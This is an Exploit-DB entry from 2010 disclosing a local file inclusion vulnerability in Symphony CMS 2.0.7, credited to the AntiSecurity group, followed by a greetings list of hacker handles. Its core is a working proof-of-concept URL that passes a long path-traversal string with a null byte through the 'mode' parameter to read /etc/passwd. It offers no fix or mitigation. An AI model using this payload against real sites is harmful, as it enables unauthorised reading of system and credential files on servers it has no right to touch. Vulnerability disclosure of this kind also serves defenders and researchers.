Symphony CMS - Local File Inclusion

EDB-ID:

12809




Platform:

PHP

Date:

2010-05-30


=============================================================================================================


  [o] Symphony CMS Local File Inclusion Vulnerability

       Software : Symphony CMS version 2.0.7
       Download : http://symphony-cms.com/download/releases/current/
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/


=============================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?mode=[LFI]


  [o] PoC

       http://localhost/index.php?mode=../../../../../../../../../../../../../../../etc/passwd%00


=============================================================================================================


  [o] Greetz

       Angela Zhang stardustmemory aJe martfella Genex
       H312Y }^-^{ matthews wishnusakti xrootboy
       k1tk4t str0ke kaka11 inc0mp13te pizzyroot
       ArRay bjork xmazinha veter f1
       all people in #evilc0de [at] irc.byroe.net


=============================================================================================================


  [o] May 30 2010 - GMT +07:00 Jakarta, Indonesia